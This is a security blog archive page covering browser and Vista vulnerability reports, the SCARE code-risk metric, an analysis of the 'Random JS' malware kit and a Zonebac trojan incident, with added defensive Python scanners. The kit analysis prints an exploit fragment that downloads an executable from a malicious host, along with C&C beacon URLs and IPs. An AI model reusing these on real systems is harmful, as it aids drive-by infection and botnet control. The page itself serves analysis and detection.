Archive for the 'Vulnerabilities & Exploits' Category

Download: Internet Explorer and Firefox Vulnerability Analysis

For most people, the web browser is central to their interaction with the Internet, connecting them to web sites around the world and to online services that provide everything from flight booking to banking to shopping. That makes the browser a key component when evaluating the security experience of users, since it is the browser that interprets web content and programs delivered from anywhere in the world.

Over the past few years, there has been much discussion of the need for improvements in browser security, but few hard data studies performed to support assertions concerning the security of available browsers.

This report documents the results of my analysis of Internet Explorer and Firefox vulnerabilities over the past few years since Internet Explorer 6 on Windows XP SP2 became available and Mozilla launched Firefox.

The report examines in detail the vulnerabilities of the past three years, breaks them down by severity, looks at version-over-version trends for each browser and finally examines how each browser is doing in terms of unfixed vulnerabilities.

Download PDF List

Download: Windows Vista One Year Vulnerability Report

Windows Vista shipped to business customers on the last day of November 2006, so the end of November 2007 marks the one year anniversary for supported production use of the product.

This paper analyzes the vulnerability disclosures and security updates for the first year of Windows Vista and looks at them in the context of its predecessor, Windows XP, along with other modern workstation operating systems from Red Hat, Ubuntu and Apple.

The results of the analysis show that Windows Vista has an improved security vulnerability profile over its predecessor. Analysis of security updates also shows that Microsoft improvements to the security update process and development process have reduced the impact of security updates to Windows administrators significantly compared to its predecessor, Windows XP.

Download PDF List

SCARE - Source Code Analysis Risk Evaluation Tool

The Source Code Analysis Risk Evaluation project is a study to create a security complexity metric that analyzes source code and provides a realistic, factual representation of the potential of that source code to produce a problematic binary. The metric does not say that the binary will be exploited, nor does it perform static analysis for known limitations such as vulnerabilities. What it does is flag code by interaction type or control, so that the developer can see which Operational Security (OpSec) holes are not protected, even though it cannot yet judge how effective a given protection is.

This computation produces a final SCARE value, like the RAV, where 100% is the proper balance between controls and OpSec holes with no Limitations. Anything less shows an imbalance: either too few Controls protect the OpSec holes, or Limitations in the OpSec and Controls degrade the security.

The SCARE analysis tool is run against source code; currently only C code is supported. The output file lists all possible operational interactions which need controls (the current version does not yet say whether, or which, controls are already there). At the bottom of the list are three numbers: Visibilities, Access, and Trusts. These three numbers can be plugged into the RAV Calculation spreadsheet available at http://www.isecom.org/ravs. The resulting Delta value is then subtracted from 100 to give the SCARE percentage, which indicates the complexity of securing this particular application. The lower the value, the worse the SCARE.

At this stage the tool cannot yet tell which interactions already have controls, or whether those controls are applicable; once that is available it will change the RAV but not the SCARE. Nor will the SCARE yet tell you where the bugs are in the code. If you are bug hunting, however, it will extract every place in the code where user inputs, and trusts involving user-accessible resources, can be found.

The SCARE methodology is designed to work for any programming language. The current implementation handles C, and ISECOM needs input and feedback from developers of other languages to expand it further.
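To make the flagging step concrete, here is a small added illustration (my own, not ISECOM's SCARE tool) of what "extracting every place where user input and trusts can be found" looks like for C source. The marker function lists and the grouping of hits into three counts named after the numbers a SCARE run ends with are assumptions for illustration only; SCARE's real classification rules and the RAV spreadsheet arithmetic are not reproduced, so the counts are only fed to "summarize", not turned into a percentage.

```python
"""Toy scan for the interaction points a SCARE-style analysis flags in C source.

Added example, not ISECOM's SCARE tool. The marker function names and the
grouping into three counts (visibilities, access, trusts) are assumptions for
illustration; the real tool's rules and the RAV math are not reproduced here.
"""
import re
from collections import defaultdict

# Assumed marker sets (hypothetical grouping, not SCARE's own rules):
#  - visibilities: places where the program exposes a reachable interface
#  - access: places where external input enters the program
#  - trusts: places where external data reaches a privileged resource
MARKERS = {
    "visibilities": r"\b(listen|accept|bind)\s*\(",
    "access": r"\b(recv|recvfrom|read|fgets|gets|scanf|getenv)\s*\(|\bargv\s*\[",
    "trusts": r"\b(system|popen|execl|execv|execve|fopen|open|strcpy|sprintf)\s*\(",
}


def scan_c_source(source: str):
    """Return {category: [(line_no, stripped line), ...]} for every flagged interaction."""
    hits = defaultdict(list)
    for no, line in enumerate(source.splitlines(), start=1):
        code = line.split("//", 1)[0]  # ignore trailing line comments
        for cat, pattern in MARKERS.items():
            if re.search(pattern, code):
                hits[cat].append((no, line.strip()))
    return dict(hits)


def summarize(hits):
    """The three numbers a run ends with; these would be plugged into the RAV sheet by hand."""
    return {cat: len(hits.get(cat, [])) for cat in MARKERS}


# Constructed sample: a tiny, deliberately sloppy C program (not from the page).
SAMPLE_C = r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
    char cmd[256];
    char *home = getenv("HOME");           // external input enters here
    if (argc > 1) strcpy(cmd, argv[1]);    // input copied into a fixed buffer
    FILE *f = fopen(cmd, "r");             // user-controlled path reaches a resource
    system(cmd);                           // user-controlled command
    return 0;
}
'''

if __name__ == "__main__":
    found = scan_c_source(SAMPLE_C)
    for cat, entries in found.items():
        for no, text in entries:
            print(f"{cat:12} line {no:3}: {text}")
    print(summarize(found))
```

Each hit is reported with its line so a bug hunter can walk straight to the input sites and the resource-touching sinks; note that a single line can legitimately land in two categories (the strcpy of argv[1] is both an input and a trust).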

If you are interested in helping with this project please contact ISECOM.

You can download SCARE here:

scare_analyst.zip

Or you can read more here.

The Random JS Malware Exploitation Kit

The Random JS infection kit, as originally named by Finjan, is perhaps the first publicly announced malicious innovation of 2008. In fact, I've managed to obtain a copy of a sample .js and witnessed the filename change on the next request, combined with the complete disappearance of any .js on the third visit. Here's some press coverage, "Over 10,000 trusted websites infected by new Trojan toolkit":

"The random js attack is performed by dynamic embedding of scripts into a webpage. It provides a random filename that can only be accessed once. This dynamic embedding is done in such a selective manner that when a user has received a page with the embedded malicious script once, it will not be referenced again on further requests. This method prevents detection of the malware in later forensic analyses."

And several more articles: "Hacking Toolkit Compromises Thousands Of Web Servers"; "Trojan toolkit infected 10000 Web sites in December"; "Legitimate sites serving up stealthy attacks". Compared to the malware-embedding attacks seen throughout 2007, which served the malware, and the exploits themselves, from a secondary domain, this attack technique hosts everything on the infected domain. Sample random and local malware locations:

bunburyymas.com/ihkxtmzl
bunburyymas.com/odjiffkl
techicorner.com/bcuoixqf
otcash.com/ktehxwmj
otcash.com/soqutkue
otcash.com/bemkwijz

Sample .js random filenames:

cgolu.js; czynd.js; eenom.js; eqfps.js; erztp.js; frpmg.js; iggmy.js; jiodm.js; khkev.js; kksyr.js; kobgw.js; kolqj.js; lvmlt.js; nrvaj.js; oalhi.js; pcqab.js; tezam.js; tfxep.js; unolc.js; vduoz.js;

Sample malware hosting URL snippet:

bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(

The copy of the malware I obtained, mosvs8.exe, which, like every sample I've ever come across in incident response, was submitted to each and every anti-virus vendor via VirusTotal, attempts to connect to 206.53.51.75, 206.53.56.30 and back39409404.com, making web requests such as:

206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e&uptime=00:00:58:38

back39409404.com/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e&uptime=00:00:58:35

The following files are partly accessible at the still-active C&Cs (the first one, for instance):

  • cgi-bin/forms.cgi
  • cgi-bin/cert.cgi
  • cgi-bin/options.cgi
  • cgi-bin/ss.cgi
  • cgi-bin/pstore.cgi
  • cgi-bin/cmd.cgi
  • cgi-bin/file.cgi
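The traces described above are what a responder can actually hunt for in proxy logs: a five-letter random .js include, an eight-letter random drop directory on the same compromised site, and the beacon to /cgi-bin/options.cgi with the user_id/socks/version_id/passphrase/crc/uptime parameters. The following detection logic is an added example of mine, not code from the post or from Finjan. The log format and the client addresses are constructed; the hosts, IP and beacon parameters come from the post.

```python
"""Flag the Random JS kit's observable traces in web proxy logs.

Added example, not code from the post or from Finjan. Log format and client
addresses are constructed; the indicators mirror those the post documents.
"""
import re
from urllib.parse import urlsplit, parse_qs

RANDOM_JS = re.compile(r"/[a-z]{5}\.js$")        # e.g. /eqfps.js, /kobgw.js
RANDOM_DROP_DIR = re.compile(r"^/[a-z]{8}$")     # e.g. /odjiffkl, /ktehxwmj
BEACON_KEYS = {"user_id", "socks", "version_id", "passphrase", "crc", "uptime"}


def classify_url(url: str):
    """Return an indicator name for a URL, or None if it matches nothing."""
    parts = urlsplit(url)
    if RANDOM_JS.search(parts.path):
        return "random_js_include"
    if RANDOM_DROP_DIR.match(parts.path):
        return "random_drop_dir"
    if parts.path.endswith("/cgi-bin/options.cgi"):
        qs = parse_qs(parts.query)
        if BEACON_KEYS <= set(qs):   # all of the kit's beacon parameters present
            return "cnc_beacon"
    return None


def scan_log(lines):
    """Return (client, url, indicator) for each line that matches an indicator.

    Constructed line format (assumed): "<client_ip> <method> <url> <status>".
    """
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[0], fields[2]
        indicator = classify_url(url)
        if indicator:
            hits.append((client, url, indicator))
    return hits


def infected_clients(hits):
    """A client is called infected on a beacon alone, or on the include+drop pair.

    The random-path rules on their own are weak (any eight-letter path matches),
    so they only count when both halves of the infection chain were seen.
    """
    by_client = {}
    for client, _url, indicator in hits:
        by_client.setdefault(client, set()).add(indicator)
    return sorted(
        client for client, inds in by_client.items()
        if "cnc_beacon" in inds or {"random_js_include", "random_drop_dir"} <= inds
    )


# Constructed sample log lines (the hosts and beacon are the post's, the clients are not).
SAMPLE_LOG = """\
10.0.0.5 GET http://bunburyymas.com/index.html 200
10.0.0.5 GET http://bunburyymas.com/eqfps.js 200
10.0.0.5 GET http://bunburyymas.com/odjiffkl 200
10.0.0.5 GET http://206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e&uptime=00:00:58:38 200
10.0.0.7 GET http://example.org/products 200
10.0.0.7 GET http://example.org/jquery.js 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("infected:", infected_clients(scan_log(SAMPLE_LOG)))
```

The second client shows why the random-path rules are correlated rather than alerted on: /products is an eight-letter path on a clean site, and it is only the combination of a five-letter .js and a random directory on the same host, or the beacon itself, that is worth paging anyone for. Because the .js is served once and then vanishes, the proxy log may be the only place the include is ever recorded.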

Have anti-virus vendors come up with a detection pattern for the .js already? Partly.

Detection rate: 11/32 (34.38%); names include JS.IEslice.aq, JS/SillyDlScript.DG, Exploit:JS/Mult.K
File size: 31679 bytes
MD5: 93152dc2392349d828526157bf601677
SHA1: 1b10790d16c9c0d87132d40503b37f82b7f03560

And now that we've witnessed the execution of such an advanced and randomized attack approach, one that limits the possibilities for assessing the impact of a malware-embedding attack the way it has been done so far, we can only speculate on what's to come by the end of the first quarter of 2008. From my perspective, however, the smartest thing about this attack technique is that they keep the leads they leave behind to a minimum, thus shifting the responsibility onto the infected host and limiting the opportunity to easily expand the investigation to the rest of their ecosystem. Moreover, although the module, or the actual kit if it really is a kit, is a Proprietary Malware Tool for the time being, it will sooner or later leak out and turn into a commodity, just as MPack and IcePack have.

Adobe Reader Exploit Drops Trojan.Zonebac

As I was driving into work this morning, my BlackBerry was flooded with Trojan.Zonebac alerts. When I got into work, I could see that a single computer at one of our sites was getting this detection on pretty much every major EXE. When I read the technical writeup of Trojan.Zonebac at Symantec, I found out why. Zonebac searches for files referenced in the following registry subkeys:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

For all the files found referenced in the registry subkey values, the Trojan creates a copy of the referenced file in a folder named "bak" at the same path as the original file. Then the Trojan will replace the original file with a copy of itself.
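That replacement behaviour leaves two traces a responder can check for without trusting the AV alert alone: a "bak" folder beside each autostart executable holding a copy of the original, and every replaced executable now carrying the identical hash (each is a copy of the same trojan). The triage check below is an added example of mine, not Symantec's or the post's code. It does not read the registry; the Run-key values are passed in as (name, path) pairs so it runs anywhere, and the on-disk layout it inspects is constructed in a temporary directory.

```python
"""Triage check for the Zonebac pattern: "bak" sibling copies and shared hashes.

Added example, not Symantec's or the post's code. Run-key entries are passed
in as (value_name, exe_path) pairs; the infected layout is constructed.
"""
import hashlib
import os
import tempfile
from collections import Counter


def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def zonebac_triage(run_entries):
    """run_entries: [(value_name, exe_path)] as read from the HKCU/HKLM ...\\Run keys.

    Returns per-entry findings, any hash shared by more than one autostart
    binary (the replaced originals are all copies of the trojan), and the
    entries that look replaced.
    """
    findings, hashes = {}, {}
    for name, exe in run_entries:
        if not os.path.isfile(exe):
            continue
        bak = os.path.join(os.path.dirname(exe), "bak", os.path.basename(exe))
        exe_hash = sha256_of(exe)
        hashes[name] = exe_hash
        has_bak = os.path.isfile(bak)
        findings[name] = {
            "bak_copy_present": has_bak,
            "bak_differs_from_exe": has_bak and sha256_of(bak) != exe_hash,
        }
    shared = [h for h, n in Counter(hashes.values()).items() if n > 1]
    suspects = sorted(name for name, f in findings.items()
                      if f["bak_copy_present"] and f["bak_differs_from_exe"])
    return {"findings": findings, "shared_hashes": shared, "suspects": suspects}


def build_infected_layout(root):
    """Constructed layout: three autostart exes, two already replaced by the trojan."""
    trojan = b"MZ-trojan-body"          # stand-in bytes, not real malware
    entries = []
    for name, original, infected in [("Updater", b"MZ-updater", True),
                                      ("Agent", b"MZ-agent", True),
                                      ("Clean", b"MZ-clean", False)]:
        d = os.path.join(root, name)
        os.makedirs(d, exist_ok=True)
        exe = os.path.join(d, name + ".exe")
        if infected:
            os.makedirs(os.path.join(d, "bak"), exist_ok=True)
            with open(os.path.join(d, "bak", name + ".exe"), "wb") as f:
                f.write(original)       # the trojan's backup of the real binary
            with open(exe, "wb") as f:
                f.write(trojan)         # original replaced by a copy of the trojan
        else:
            with open(exe, "wb") as f:
                f.write(original)
        entries.append((name, exe))
    return entries


def demo():
    with tempfile.TemporaryDirectory() as root:
        return zonebac_triage(build_infected_layout(root))


if __name__ == "__main__":
    result = demo()
    print("suspects:", result["suspects"])
    print("shared hashes:", result["shared_hashes"])
```

On a real host you would feed it the values enumerated from the two Run keys above. The shared-hash check is the cheap cross-check that distinguishes "several programs replaced by one trojan" from a run of AV false positives, and the bak copies are the only thing worth keeping from the box; even then, restore from them only after their hashes match known-good vendor binaries, since nothing stops the next variant from tampering with the backup too.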

Now that is a mess. Normally, I see it as a fun challenge to clean machines, but in this case with so many EXEs suspect, and with the computer being remote, it seemed to be a better bet to wipe the system.

This evening the SANS Handler Diary had an entry revealing that the Adobe Reader/Professional vulnerability is currently being exploited and Zonebac is being dropped. That explains what happened.

It looks like I may have to move up my implementation of Adobe Reader 8.2.1.

Brian Krebs' writeup on this reports that, according to iDefense, this was spreading through banner ads.